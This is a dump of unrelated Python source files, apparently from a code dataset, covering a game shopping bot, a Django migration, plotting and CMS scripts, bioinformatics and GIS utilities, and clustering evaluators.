4.) While being ingame, press resume_key (default F11) to start the shopping, and exit_key (default F12) to stop it.
"""
def __init__(self):
# Set look_for variables to False if you dont like your personal shopper to look for these
# Obviously something need to be set to True, or your shopper will be very confused
self.look_for_scepters = Config().shop["shop_hammerdin_scepters"]
self.speed_factor = 1.0 + Config().shop["speed_factor"]
if (self.speed_factor <= 0):
Logger.error("Can not use a speed factor less than negative 1!! Please update shop.ini. Exiting.")
os._exit(0)
self.apply_pather_adjustment = Config().shop["apply_pather_adjustment"]
self.run_count = 0
self.start_time = time.time()
# items config
self.roi_shop_item_stats = [0, 0, Config().ui_pos["screen_width"] // 2, Config().ui_pos["screen_height"] - 100]
self.roi_vendor = Config().ui_roi["left_inventory"]
self.rx, self.ry, _, _ = self.roi_vendor
self.sb_x, self.sb_y = convert_screen_to_monitor((180, 77))
self.c_x, self.c_y = convert_screen_to_monitor((Config().ui_pos["center_x"], Config().ui_pos["center_y"]))
self.items_evaluated = 0
self.items_bought = 0
self.look_for_leaf_runeword_base = Config().shop["shop_leaf_runeword_base"]
self.look_for_wand_of_life_tap = Config().shop["shop_weapon_life_tap"]
self.look_for_wand_of_lower_resist = Config().shop["shop_weapon_lower_resist"]
super(DrognanShopper, self).__init__()
self.get_tabs()
def get_name(self):
return "Drognan"
def run(self):
Logger.info("Personal Drognan Shopper at your service! Hang on, running some errands...")
self.reset_shop()
self.shop_loop()
def shop_loop(self):
# This is the main shopping loop. It can be further generalized to more easily support new items,
# But this is sufficient for now.
while True:
self.check_run_time()
trade_is_open = False
while not trade_is_open:
open_npc_menu(Npc.DROGNAN)
press_npc_btn(Npc.DROGNAN, "trade")
trade_is_open = self.is_trade_open()
time.sleep(0.1)
img = grab()
for search_tab in self.search_tabs:
self.click_tab(search_tab)
self.search_for_leaf_runeword_base()
self.search_for_wand_of_life_tap()
self.search_for_wand_of_lower_resist()
if self.look_for_scepters is True:
mouse.move(self.sb_x, self.sb_y, randomize=3, delay_factor=[0.6, 0.8])
wait(0.05, 0.1)
mouse.press(button="left")
wait(0.05, 0.1)
mouse.release(button="left")
wait(0.3, 0.4)
# Search for items
item_pos = []
img = grab().copy()
item_keys = ["SCEPTER1", "SCEPTER2", "SCEPTER3", "SCEPTER4", "SCEPTER5"]
for ck in item_keys:
template_match = TemplateFinder(True).search(ck, img, roi=self.roi_vendor)
if template_match.valid:
item_pos.append(template_match.center)
# check out each item
for pos in item_pos:
x_m, y_m = convert_screen_to_monitor(pos)
mouse.move(x_m, y_m, randomize=3, delay_factor=[0.5, 0.6])
wait(0.5, 0.6)
img_stats = grab()
# First check for +2 Paladin Skills. This weeds out most scepters right away.
if TemplateFinder(True).search("2_TO_PALADIN_SKILLS", img_stats, roi=self.roi_shop_item_stats, threshold=0.94).valid:
# Has 2 Pally skills, check blessed hammers next
if TemplateFinder(True).search("TO_BLESSED_HAMMERS", img_stats, roi=self.roi_shop_item_stats, threshold=0.9).valid:
# Has 2 Pally skills AND Blessed Hammers, check Concentration next
if TemplateFinder(True).search("TO_CONCENTRATION", img_stats, roi=self.roi_shop_item_stats, threshold=0.9).valid:
# Has 2 Pally skills AND Blessed Hammers AND Concentration. We're good! Buy it!
mouse.click(button="right")
Logger.info(f"Item bought!")
self.items_bought += 1
time.sleep(1)
self.items_evaluated += 1
keyboard.send("esc")
# Done with this shopping round
self.reset_shop()
self.run_count += 1
def reset_shop(self):
# We want to walk out the town exit to the top right and come back down to drognan
# This can probably be tweaked but seems to work well enough for now.
# Exit town
self.move_shopper(200, -100, 2.5)
self.move_shopper(-200, 100, 2)
def get_tabs(self):
"""
Sets up which tabs we want to search in
"""
if self.look_for_wand_of_life_tap or self.look_for_wand_of_lower_resist:
self.search_tabs.add(2)
if self.look_for_leaf_runeword_base:
self.search_tabs.add(2)
self.search_tabs.add(3)
| StarcoderdataPython |
1621732 | # -*- coding: utf-8 -*-
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('open_humans', '0015_auto_20150410_0042'),
]
operations = [
migrations.AlterModelManagers(
name='member',
managers=[
],
),
]
| StarcoderdataPython |
89599 | import sys
from numpy import *
nline = eval(sys.argv[1])
t = linspace(0., 1., nline)
x = eval(sys.argv[2])
y = eval(sys.argv[3])
f = open(sys.argv[4], 'w')
f.write('# vtk DataFile Version 4.2\n')
f.write('vtk output\n')
f.write('ASCII\n')
f.write('DATASET UNSTRUCTURED_GRID\n')
f.write('POINTS {} double\n'.format(nline))
for i in range(nline):
f.write('{} {} 0\n'.format(x[i], y[i]))
ncells = nline - 1
f.write('CELLS {} {}\n'.format(ncells, ncells*3))
for i in range(ncells):
f.write('2 {} {}\n'.format(i, i + 1))
f.write('CELL_TYPES {}\n'.format(ncells))
for i in range(ncells):
f.write('3\n')
f.close()
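# Example invocation (added for illustration; the expression strings are eval'd
# with t = linspace(0, 1, nline) and numpy names in scope; the script filename
# below is hypothetical -- use whatever this file is saved as):
#   python make_line_vtk.py 100 "cos(2*pi*t)" "sin(2*pi*t)" circle.vtk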
| StarcoderdataPython |
1628519 | <filename>labs_final/lab3/viskit/frontend.py<gh_stars>1-10
#!/usr/bin/env python
import os
import flask
from viskit import core
import sys
import argparse
import json
import numpy as np
import plotly.offline as po
import plotly.graph_objs as go
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
def unique(l):
return list(set(l))
def flatten(l):
return [item for sublist in l for item in sublist]
def sliding_mean(data_array, window=5):
data_array = np.array(data_array)
new_list = []
for i in range(len(data_array)):
indices = list(range(max(i - window + 1, 0),
min(i + window + 1, len(data_array))))
avg = 0
for j in indices:
avg += data_array[j]
avg /= float(len(indices))
new_list.append(avg)
return np.array(new_list)
app = flask.Flask(__name__, static_url_path='/static')
exps_data = None
plottable_keys = None
x_plottable_keys = None
distinct_params = None
data_paths = None
@app.route('/js/<path:path>')
def send_js(path):
return flask.send_from_directory('js', path)
@app.route('/css/<path:path>')
def send_css(path):
return flask.send_from_directory('css', path)
def make_plot(plot_list, title=None):
data = []
for idx, plt in enumerate(plot_list):
color = core.color_defaults[idx % len(core.color_defaults)]
x = list(plt.xs)
if plt.display_mode in ["mean_std", "mean_se"]:
y = list(plt.means)
if plt.display_mode == "mean_std":
y_upper = list(plt.means + plt.stds)
y_lower = list(plt.means - plt.stds)
elif plt.display_mode == "mean_se":
y_upper = list(plt.means + plt.ses)
y_lower = list(plt.means - plt.ses)
else:
raise NotImplementedError
data.append(go.Scatter(
x=x + x[::-1],
y=y_upper + y_lower[::-1],
fill='tozerox',
fillcolor=core.hex_to_rgb(color, 0.2),
line=go.Line(color='transparent'),
showlegend=False,
legendgroup=plt.legend,
hoverinfo='none'
))
data.append(go.Scatter(
x=x,
y=y,
name=plt.legend,
legendgroup=plt.legend,
line=dict(color=core.hex_to_rgb(color)),
))
elif plt.display_mode == "individual":
for idx, y in enumerate(plt.ys):
data.append(go.Scatter(
x=x,
y=y,
name=plt.legend,
legendgroup=plt.legend,
line=dict(color=core.hex_to_rgb(color)),
showlegend=idx == 0,
))
else:
raise NotImplementedError
layout = go.Layout(
legend=dict(
x=1,
y=1,
),
title=title,
)
fig = go.Figure(data=data, layout=layout)
fig_div = po.plot(fig, output_type='div', include_plotlyjs=False)
if "footnote" in plot_list[0]:
footnote = "<br />".join([
r"<span><b>%s</b></span>: <span>%s</span>" % (
plt.legend, plt.footnote)
for plt in plot_list
])
return r"%s<div>%s</div>" % (fig_div, footnote)
else:
return fig_div
def summary_name(exp, selector=None):
return exp.params["exp_name"]
def check_nan(exp):
return all(not np.any(np.isnan(vals)) for vals in list(exp.progress.values()))
def get_plot_instruction(
x_plot_key,
plot_key,
display_mode,
split_key=None,
group_key=None,
filters=None,
):
# print(x_plot_key, plot_key, split_key, group_key, filters)
# if x_plot_key != "(default)":
# group_key = None
selector = core.Selector(exps_data)
if filters is None:
filters = dict()
for k, v in filters.items():
selector = selector.where(k, str(v))
if split_key is not None:
vs = [vs for k, vs in distinct_params if k == split_key][0]
split_selectors = [selector.where(split_key, v) for v in vs]
split_legends = list(map(str, vs))
else:
split_selectors = [selector]
split_legends = ["Plot"]
plots = []
counter = 1
for split_selector, split_legend in zip(split_selectors, split_legends):
if group_key and group_key != "exp_name":
vs = [vs for k, vs in distinct_params if k == group_key][0]
group_selectors = [split_selector.where(group_key, v) for v in vs]
group_legends = [str(x) for x in vs]
else:
group_key = "exp_name"
vs = sorted([x.params["exp_name"]
for x in split_selector.extract()])
group_selectors = [split_selector.where(group_key, v) for v in vs]
group_legends = [summary_name(
x.extract()[0], split_selector) for x in group_selectors]
to_plot = []
for group_selector, group_legend in zip(group_selectors, group_legends):
filtered_data = group_selector.extract()
if len(filtered_data) > 0:
progresses = [
exp.progress.get(plot_key, np.array([np.nan])) for exp in filtered_data]
sizes = list(map(len, progresses))
# more intelligent:
max_size = max(sizes)
progresses = [
np.concatenate([ps, np.ones(max_size - len(ps)) * np.nan]) for ps in progresses
]
if x_plot_key == "(default)":
xs = np.arange(max_size)
else:
# first decide what the xs should be
# ideally, it should be the union of
all_xs = np.unique(np.sort(np.concatenate(
[d.progress.get(x_plot_key, []) for d in filtered_data])))
interp_progresses = []
for d in filtered_data:
if x_plot_key in d.progress:
assert plot_key in d.progress
interp_progresses.append(
np.interp(
all_xs,
d.progress[x_plot_key],
d.progress[plot_key],
right=np.nan
)
)
else:
continue
progresses = interp_progresses
xs = all_xs
if display_mode == "mean_std":
means = np.nanmean(progresses, axis=0)
stds = np.nanstd(progresses, axis=0)
to_plot.append(AttrDict(
means=means,
stds=stds,
legend=group_legend,
xs=xs,
display_mode=display_mode,
))
elif display_mode == "mean_se":
means = np.nanmean(progresses, axis=0)
ses = np.nanstd(progresses, axis=0) / \
np.sqrt(np.sum(1 - np.isnan(progresses), axis=0))
to_plot.append(AttrDict(
means=means,
ses=ses,
legend=group_legend,
xs=xs,
display_mode=display_mode,
))
elif display_mode == "individual":
to_plot.append(AttrDict(
xs=xs,
ys=progresses,
legend=group_legend,
display_mode=display_mode,
))
else:
raise NotImplementedError
if len(to_plot) > 0:
fig_title = "%s: %s" % (split_key, split_legend)
plots.append(make_plot(
to_plot,
title=fig_title,
))
counter += 1
return "\n".join(plots)
def parse_float_arg(args, key):
x = args.get(key, "")
try:
return float(x)
except Exception:
return None
@app.route("/plot_div")
def plot_div():
args = flask.request.args
reload_s3 = args.get("reload_s3", False)
x_plot_key = args.get("x_plot_key", "(default)")
plot_key = args.get("plot_key")
display_mode = args.get("display_mode", "mean_std")
split_key = args.get("split_key", "")
group_key = args.get("group_key", "")
filters_json = args.get("filters", "{}")
filters = json.loads(filters_json)
if len(split_key) == 0:
split_key = None
if len(group_key) == 0:
group_key = None
print(reload_s3, type(reload_s3))
if reload_s3:
project_root = os.path.abspath(
os.path.join(os.path.dirname(__file__), ".."))
print(data_paths)
for data_path in data_paths:
if "data/s3/" in data_path:
exp_group = data_path.split("data/s3/")[-1].split("/")[0]
os.system("python %s/scripts/sync_s3.py %s" %
(project_root, exp_group))
reload_data()
plot_div = get_plot_instruction(
x_plot_key=x_plot_key,
plot_key=plot_key,
display_mode=display_mode,
split_key=split_key,
group_key=group_key,
filters=filters,
)
return plot_div
@app.route("/")
def index():
if "AverageReturn" in plottable_keys:
plot_key = "AverageReturn"
elif len(plottable_keys) > 0:
plot_key = plottable_keys[0]
else:
plot_key = None
if len(distinct_params) > 0:
group_key = distinct_params[0][0]
else:
group_key = None
print("Getting plot instruction...")
plot_div = get_plot_instruction(
x_plot_key="(default)", plot_key=plot_key, display_mode="mean_std", split_key=None, group_key=group_key)
print("Rendering...")
rendered = flask.render_template(
"main.html",
plot_div=plot_div,
plot_key=plot_key,
group_key=group_key,
plottable_keys=plottable_keys,
x_plot_key="(default)",
x_plottable_keys=["(default)"] + x_plottable_keys,
distinct_param_keys=[str(k) for k, v in distinct_params],
distinct_params=dict([(str(k), list(map(str, v)))
for k, v in distinct_params]),
)
return rendered
def is_increasing_key(key, exps_data):
for exp in exps_data:
if key in exp.progress and not is_increasing(exp.progress[key]):
return False
return True
def is_increasing(arr):
return np.all(arr[1:] - arr[:-1] >= 0) and np.max(arr) > np.min(arr)
def reload_data():
global exps_data
global plottable_keys
global distinct_params
global x_plottable_keys
exps_data = core.load_exps_data(data_paths)
plottable_keys = sorted(list(
set(flatten(list(exp.progress.keys()) for exp in exps_data))))
distinct_params = sorted(core.extract_distinct_params(exps_data))
x_plottable_keys = [
key for key in plottable_keys if is_increasing_key(key, exps_data)]
if __name__ == "__main__":
default_port = int(os.environ.get("VISKIT_PORT", 5000))
parser = argparse.ArgumentParser()
parser.add_argument("data_paths", type=str, nargs='*')
parser.add_argument("--debug", action="store_true", default=False)
parser.add_argument("--port", type=int, default=default_port)
args = parser.parse_args(sys.argv[1:])
data_paths = args.data_paths
print("Importing data from {path}...".format(path=args.data_paths))
reload_data()
url = "http://localhost:%d" % (args.port)
print("Done! View %s in your browser" % (url))
app.run(host='0.0.0.0', port=args.port, debug=args.debug, threaded=True)
| StarcoderdataPython |
3395439 | #!/usr/bin/env python3
# TODO: add cmdline options to suppress emailed reports
if __name__ == '__main__':
if __package__ is None:
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
import settings
from core.models.transaction import transaction
from core.cms.queue import process_queue
opts = set()
if len(sys.argv) > 1:
for n in range(1, len(sys.argv)):
opts.add(sys.argv[n])
nowait = True if '--nowait' in opts else False
clear_job = True if '--clearjob' in opts else False
@transaction
def run(n):
return process_queue(n)
import datetime
product_id = '{}, running in {}'.format(settings.PRODUCT_NAME, settings.APPLICATION_PATH)
print ('{}\nScheduled tasks script.'.format(product_id))
if nowait:
print('Ignoring insert wait.')
print ('Looking for scheduled tasks...')
from core.models import Page, page_status, Queue
blogs_to_check = {}
scheduled_page_report = []
scheduled_pages = Page.select().where(
Page.status == page_status.scheduled,
Page.publication_date <= datetime.datetime.utcnow()).order_by(
Page.publication_date.desc())
total_pages = scheduled_pages.count()
print ('{} pages scheduled'.format(total_pages))
if total_pages > 0:
for p in scheduled_pages.select(Page.blog).distinct():
b = p.blog
blogs_to_check[b.id] = b
queue_count = Queue.select(Queue.blog).distinct()
if queue_count.count() > 0:
for n in queue_count:
b = n.blog
print ('Blog {} has existing queue items'.format(b.id))
blogs_to_check[b.id] = b
if blogs_to_check:
print ("Starting run.")
from core.cms.queue import (queue_page_actions, queue_index_actions,
queue_ssi_actions)
from core.models import db
from core.log import logger
from time import sleep
for b in blogs_to_check:
try:
n = blogs_to_check[b]
skip = None
if clear_job:
Queue.stop(n)
if nowait is False and Queue.is_insert_active(n):
skip = 'Insert in progress for blog {}. Skipping this run.'.format(n.id)
elif Queue.control_jobs(n).count() > 0:
skip = 'Job already running for blog {}. Skipping this run.'.format(n.id)
if skip:
print (skip)
scheduled_page_report.append(skip)
continue
for p in scheduled_pages.where(Page.blog == b).distinct():
scheduled_page_report.append('Scheduled pages:')
try:
with db.atomic() as txn:
scheduled_page_report.append('{} -- on {}'.format(p.title, p.publication_date))
p.status = page_status.published
p.save(p.user, no_revision=True)
queue_page_actions((p,))
blogs_to_check[p.blog.id] = p.blog
except Exception as e:
problem = 'Problem with page {}: {}'.format(p.title, e)
print (problem)
scheduled_page_report.append(problem)
queue_index_actions(n)
queue_ssi_actions(n)
waiting = Queue.job_counts(blog=n)
waiting_report = '{} jobs waiting for blog {}'.format(waiting, n.id)
print (waiting_report)
scheduled_page_report.append(waiting_report)
Queue.start(n)
print ("Processing {} jobs for blog '{}'.".format(
waiting, n.name))
from time import clock
begin = clock()
passes = 1
while 1:
sleep(.1)
remaining = run(n)
print ("Pass {}: {} jobs remaining.".format(passes, remaining))
if remaining == 0:
break
passes += 1
end = clock()
total_time = end - begin
time_elapsed = "Total elapsed time: {} seconds".format(int(total_time))
print (time_elapsed)
scheduled_page_report.append(time_elapsed)
except Exception as e:
problem = 'Problem with blog {}: {}'.format(b, e)
print (problem)
scheduled_page_report.append(problem)
if scheduled_page_report:
message_text = '''
This is a scheduled-tasks report from the installation of {}.
{}
'''.format(product_id,
'\n'.join(scheduled_page_report))
import smtplib
from email.mime.text import MIMEText
from core.auth import get_users_with_permission, role
admin_users = get_users_with_permission(role.SYS_ADMIN)
admins = []
for n in admin_users:
msg = MIMEText(message_text)
msg['Subject'] = 'Scheduled activity report for {}'.format(product_id)
msg['From'] = n.email
msg['To'] = n.email
admins.append(n.email)
s = smtplib.SMTP('localhost')
s.send_message(msg)
s.quit()
print ('Reports emailed to {}.'.format(','.join(admins)))
logger.info("Scheduled job run, processed {} pages.".format(total_pages))
else:
print ('No scheduled tasks found to run.')
print ('Scheduled tasks script completed.')
| StarcoderdataPython |
3369985 | <filename>bot/plugins/wideoidea.py<gh_stars>0
from __future__ import annotations
import os
import tempfile
from bot.config import Config
from bot.data import command
from bot.data import format_msg
from bot.message import Message
from bot.util import check_call
@command('!wideoidea', '!videoidea', secret=True)
async def cmd_videoidea(config: Config, msg: Message) -> str:
if not msg.is_moderator and msg.name_key != config.channel:
return format_msg(msg, 'https://youtu.be/RfiQYRn7fBg')
_, _, rest = msg.msg.partition(' ')
async def _git(*cmd: str) -> None:
await check_call('git', '-C', tmpdir, *cmd)
with tempfile.TemporaryDirectory() as tmpdir:
await _git(
'clone', '--depth=1', '--quiet',
'<EMAIL>:asottile/scratch.wiki', '.',
)
ideas_file = os.path.join(tmpdir, 'anthony-explains-ideas.md')
with open(ideas_file, 'rb+') as f:
f.seek(-1, os.SEEK_END)
c = f.read()
if c != b'\n':
f.write(b'\n')
f.write(f'- {rest}\n'.encode())
await _git('add', '.')
await _git('commit', '-q', '-m', 'idea added by !videoidea')
await _git('push', '-q', 'origin', 'HEAD')
return format_msg(
msg,
'added! https://github.com/asottile/scratch/wiki/anthony-explains-ideas', # noqa: E501
)
| StarcoderdataPython |
90728 | #!/usr/bin/env python
# encoding: utf-8
from __future__ import (absolute_import, division,
print_function, unicode_literals)
import os, sys, re
import logging
import argparse
import collections
logging.basicConfig(stream=sys.stderr, level=logging.INFO)
logger = logging.getLogger(__file__)
def main():
parser = argparse.ArgumentParser(description="estimates gene length as isoform lengths weighted by TPM expression values")
parser.add_argument("--gene_trans_map", dest="gene_trans_map_file", type=str, default="",
required=True, help="gene-to-transcript mapping file, format: gene_id(tab)transcript_id")
parser.add_argument("--trans_lengths", dest="trans_lengths_file", type=str, required=True,
help="transcript length file, format: trans_id(tab)length")
parser.add_argument("--TPM_matrix", dest="TPM_matrix_file", type=str, default="",
required=True, help="TPM expression matrix")
parser.add_argument("--debug", required=False, action="store_true", default=False, help="debug mode")
args = parser.parse_args()
if args.debug:
logger.setLevel(logging.DEBUG)
trans_to_gene_id_dict = parse_gene_trans_map(args.gene_trans_map_file)
trans_lengths_dict = parse_trans_lengths_file(args.trans_lengths_file)
trans_to_TPM_vals_dict = parse_TPM_matrix(args.TPM_matrix_file)
weighted_gene_lengths = compute_weighted_gene_lengths(trans_to_gene_id_dict,
trans_lengths_dict,
trans_to_TPM_vals_dict)
print("#gene_id\tlength")
for gene_id,length in weighted_gene_lengths.items():
print("\t".join([gene_id,str(length)]))
sys.exit(0)
def compute_weighted_gene_lengths(trans_to_gene_id_dict, trans_lengths_dict, trans_to_TPM_vals_dict):
gene_id_to_trans_list = collections.defaultdict(list)
gene_id_to_length = {}
pseudocount = 1
for trans_id,gene_id in trans_to_gene_id_dict.items():
gene_id_to_trans_list[gene_id].append(trans_id)
for gene_id,trans_list in gene_id_to_trans_list.items():
if len(trans_list) == 1:
gene_id_to_length[gene_id] = trans_lengths_dict[ trans_list[0] ]
else:
sum_length_x_expr = 0
sum_expr = 0
trans_expr_lengths = []
for trans_id in trans_list:
trans_len = trans_lengths_dict[trans_id]
expr_vals = trans_to_TPM_vals_dict[trans_id]
trans_sum_expr = sum(expr_vals) + pseudocount
trans_expr_lengths.append((trans_len, trans_sum_expr))
sum_length_x_expr += trans_sum_expr * trans_len
sum_expr += trans_sum_expr
weighted_gene_length = sum_length_x_expr / sum_expr
gene_id_to_length[gene_id] = int(round(weighted_gene_length))
logger.debug("Computing weighted length of {}: {} => {}".format(gene_id,
trans_expr_lengths,
weighted_gene_length))
return gene_id_to_length
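# Worked example (added for illustration): a gene with two isoforms of lengths
# 1000 and 500 whose summed TPMs are 8 and 0 gets, after the pseudocount of 1,
# weights 9 and 1, so the weighted gene length is (1000*9 + 500*1) / 10 = 950.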
def parse_TPM_matrix(TPM_matrix_file):
trans_to_TPM_vals_dict = {}
with open(TPM_matrix_file) as f:
header = next(f)
for line in f:
line = line.rstrip()
vals = line.split("\t")
trans_id = vals[0]
expr_vals_list = vals[1:]
expr_vals_list = [float(x) for x in expr_vals_list]
trans_to_TPM_vals_dict[trans_id] = expr_vals_list
return trans_to_TPM_vals_dict
def parse_trans_lengths_file(trans_lengths_file):
trans_id_to_length = {}
with open(trans_lengths_file) as f:
for line in f:
line = line.rstrip()
if line[0] == '#':
continue
(trans_id, length) = line.split("\t")
trans_id_to_length[trans_id] = int(length)
return trans_id_to_length
def parse_gene_trans_map(gene_trans_map_file):
trans_to_gene_id = {}
with open(gene_trans_map_file) as f:
for line in f:
line = line.rstrip()
(gene_id, trans_id) = line.split("\t")
trans_to_gene_id[trans_id] = gene_id;
return trans_to_gene_id
####################
if __name__ == "__main__":
main()
| StarcoderdataPython |
112924 | <filename>resultScript/remove_polygons.py
#!/usr/bin/env python
# Filename: remove_polygons.py
"""
introduction: keep the true positive only, i.e., remove polygons with IOU less than or equal to 0.5.
it can also be used to remove other polygons based on an attribute
authors: <NAME>
email:<EMAIL>
add time: 26 February, 2019
"""
import os,sys
from optparse import OptionParser
HOME = os.path.expanduser('~')
# path of DeeplabforRS
codes_dir2 = HOME + '/codes/PycharmProjects/DeeplabforRS'
sys.path.insert(0, codes_dir2)
import basic_src.io_function as io_function
import basic_src.basic as basic
import vector_features
from vector_features import shape_opeation
def check_same_projection(shp_file, file2):
'''
check the projection of shape file and the raster file
:param shp_file:
:param raster_file:
:return:
'''
shp_args_list = ['gdalsrsinfo','-o','epsg',shp_file]
shp_epsg_str = basic.exec_command_args_list_one_string(shp_args_list)
raster_args_list = ['gdalsrsinfo','-o','epsg',file2]
raster_epsg_str = basic.exec_command_args_list_one_string(raster_args_list)
if shp_epsg_str == raster_epsg_str:
return True
else:
return False
def remove_polygons(shapefile,field_name, threshold, bsmaller,output):
# remove the not narrow polygon based on ratio_p_a
operation_obj = shape_opeation()
if operation_obj.remove_shape_baseon_field_value(shapefile, output, field_name, threshold, smaller=bsmaller) is False:
return False
def remove_lines_based_on_polygons(shp_line,output_mainline,shp_polygon):
'''
Remove lines if they don't overlap any polygons.
:param shp_line:
:param output_mainline:
:param shp_polygon:
:return:
'''
if check_same_projection(shp_line,shp_polygon) is False:
raise ValueError('%s and %s don\'t have the same projection')
print(shp_line,shp_polygon)
inte_lines_list = vector_features.get_intersection_of_line_polygon(shp_line,shp_polygon)
b_remove = [True if item.is_empty else False for item in inte_lines_list ]
# print(b_remove)
# a=0
# b=0
# for rm in b_remove:
# if rm is True:
# a += 1
# else:
# b += 1
# print(a,b)
#note that, after remove, the number of main lines are greater than the number of polygons in "shp_polygon"
#This is because, in Beiluhe, some mapped thaw slumps close to each other were merged to one
operation_obj = shape_opeation()
if operation_obj.remove_shapes_by_list(shp_line,output_mainline,b_remove) is False:
return False
def remove_polygons_intersect_multi_ground_truths(shp_file, shp_ground_truth, output, copy_fields=None):
'''
:param shp_file:
:param shp_ground_truth:
:param output:
:param copy_fields:
:return:
'''
operation_obj = shape_opeation()
return operation_obj.remove_polygons_intersect_multi_polygons(shp_file, shp_ground_truth, output, copy_fields=copy_fields)
def main(options, args):
polygons_shp = args[0]
field_name = options.field_name
threshold = options.threshold
bsmaller = options.bsmaller # if true, then remove the bsmaller ones
output = options.output
# print(field_name,threshold,bsmaller,output)
if field_name is not None:
remove_polygons(polygons_shp, field_name, threshold, bsmaller, output)
# remove the file in main_lines
shp_mainline = options.shp_mainline
if shp_mainline is not None:
output_mainline = options.output_mainline
remove_lines_based_on_polygons(shp_mainline, output_mainline, output)
# remove polygon based on the intersection with ground truth polygons
val_polygon = options.val_polygon
if val_polygon is not None:
copy_fields = options.copy_fields
copy_fields = copy_fields.split(',')
remove_polygons_intersect_multi_ground_truths(polygons_shp, val_polygon, output, copy_fields=copy_fields)
if __name__ == "__main__":
usage = "usage: %prog [options] shp_file"
parser = OptionParser(usage=usage, version="1.0 2019-1-4")
    parser.description = "Introduction: remove polygons based on an attribute's values"
parser.add_option("-o", "--output",
action="store", dest="output",default='save_polygon.shp',
help="save file path")
parser.add_option("-f", "--field_name",
action="store", dest="field_name",
help="the field name of the attribute based on which to remove polygons")
parser.add_option("-t", "--threshold",
action="store", dest="threshold", default=0.5,type=float,
help="the threshold to remove polygons")
parser.add_option("-l", "--mainline",
action="store", dest="shp_mainline",
help="the shape file store the main_Line of polygons")
parser.add_option("-m", "--output_mainline",
action="store", dest="output_mainline",default='save_mainline.shp',
help="save file path of main line")
parser.add_option("-v", "--val_polygon",
action="store", dest="val_polygon",
help="the path of validation polygons")
parser.add_option("-c", "--copy_fields",
action="store", dest="copy_fields",
help="the multi field names to be copied from validation polygons, e.g., 'area,perimeter', use comma to sperate them but no space")
parser.add_option("-s", "--bsmaller",
action="store_true", dest="bsmaller",
help="True will remove the bsmaller ones")
(options, args) = parser.parse_args()
if len(sys.argv) < 2:
parser.print_help()
sys.exit(2)
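    # Example invocation (a sketch; the shapefile and field names are hypothetical):
    #   python remove_polygons.py mapped_polygons.shp -f IoU -t 0.5 -s -o true_positives.shp
    # which, per the script header, keeps only polygons whose IoU is above the threshold.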
    main(options, args)
# django-doctor/lite-api
# Generated by Django 2.2.13 on 2020-06-16 08:37
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import model_utils.fields
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
("licences", "0005_auto_20200616_0837"),
("organisations", "0008_auto_20200601_0814"),
]
operations = [
migrations.CreateModel(
name="OpenLicenceReturns",
fields=[
(
"created_at",
model_utils.fields.AutoCreatedField(
default=django.utils.timezone.now, editable=False, verbose_name="created_at"
),
),
("id", models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
("returns_data", models.TextField()),
("year", models.PositiveSmallIntegerField()),
("licences", models.ManyToManyField(related_name="open_licence_returns", to="licences.Licence")),
(
"organisation",
models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to="organisations.Organisation"),
),
],
options={"abstract": False,},
),
]
#!/usr/bin/env python
# -*- coding: utf-8 -*-
class TestRailBaseError(Exception):
def __str__(self):
return "[TestRailAPI] %s || (%s) || %s" \
% (self.status, self.reason, self.msg)
class TestRailAuthError(TestRailBaseError):
def __init__(self, status_code, reason):
self.status = status_code
self.reason = reason
self.msg = dict()
class TesRailAPIError(TestRailBaseError):
def __init__(self, res):
self.status = res.status_code
self.reason = res.reason
self.msg = res.content
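# Usage sketch (assuming `res` is a requests.Response-like object exposing the
# status_code, reason and content attributes the constructor reads):
#   if res.status_code != 200:
#       raise TesRailAPIError(res)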
from abc import ABC, abstractmethod
from typing import Dict, Sequence, Generic, TypeVar
from .eval_stats.eval_stats_clustering import ClusteringUnsupervisedEvalStats, \
ClusteringSupervisedEvalStats, ClusterLabelsEvalStats
from .evaluator import MetricsDictProvider
from ..clustering import EuclideanClusterer
from ..util.profiling import timed
TClusteringEvalStats = TypeVar("TClusteringEvalStats", bound=ClusterLabelsEvalStats)
class ClusteringModelEvaluator(MetricsDictProvider, Generic[TClusteringEvalStats], ABC):
@timed
def _computeMetrics(self, model: EuclideanClusterer, **kwargs) -> Dict[str, float]:
"""
Evaluate the model and return the results as dict
:param model:
:param kwargs: will be passed to evalModel
:return:
"""
evalStats = self.evalModel(model, **kwargs)
return evalStats.getAll()
@abstractmethod
def evalModel(self, model: EuclideanClusterer, **kwargs) -> TClusteringEvalStats:
pass
class ClusteringModelUnsupervisedEvaluator(ClusteringModelEvaluator[ClusteringUnsupervisedEvalStats]):
def __init__(self, datapoints):
self.datapoints = datapoints
def evalModel(self, model: EuclideanClusterer, fit=True):
"""
Retrieve evaluation statistics holder for the clustering model
:param model:
:param fit: whether to fit on the evaluator's data before retrieving statistics.
Set this to False if the model you wish to evaluate was already fitted on the desired dataset
:return: instance of ClusteringUnsupervisedEvalStats that can be used for calculating various evaluation metrics
"""
if fit:
model.fit(self.datapoints)
return ClusteringUnsupervisedEvalStats.fromModel(model)
class ClusteringModelSupervisedEvaluator(ClusteringModelEvaluator[ClusteringSupervisedEvalStats]):
def __init__(self, datapoints, trueLabels: Sequence[int], noiseLabel=-1):
"""
:param datapoints:
:param trueLabels: labels of the true clusters, including the noise clusters.
:param noiseLabel: label of the noise cluster (if there is one) in the true labels
"""
if len(trueLabels) != len(datapoints):
raise ValueError("true labels must be of same length as datapoints")
self.datapoints = datapoints
self.trueLabels = trueLabels
self.noiseLabel = noiseLabel
def evalModel(self, model: EuclideanClusterer, fit=True):
"""
Retrieve evaluation statistics holder for the clustering model
:param model:
:param fit: whether to fit on the evaluator's data before retrieving statistics.
Set this to False if the model you wish to evaluate was already fitted on the desired dataset
:return: instance of ClusteringSupervisedEvalStats that can be used for calculating various evaluation metrics
"""
if fit:
model.noiseLabel = self.noiseLabel
model.fit(self.datapoints)
else:
if model.noiseLabel != self.noiseLabel:
raise ValueError(f"Noise label of evaluator does not match noise label of the model:"
f" {self.noiseLabel} != {model.noiseLabel}. "
f"Either evaluate with fit=True or adjust the noise label in the ground truth labels")
return ClusteringSupervisedEvalStats.fromModel(model, self.trueLabels)
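# Usage sketch (hypothetical data and model; `datapoints` is whatever array-like the
# clusterer accepts and `model` is an EuclideanClusterer instance):
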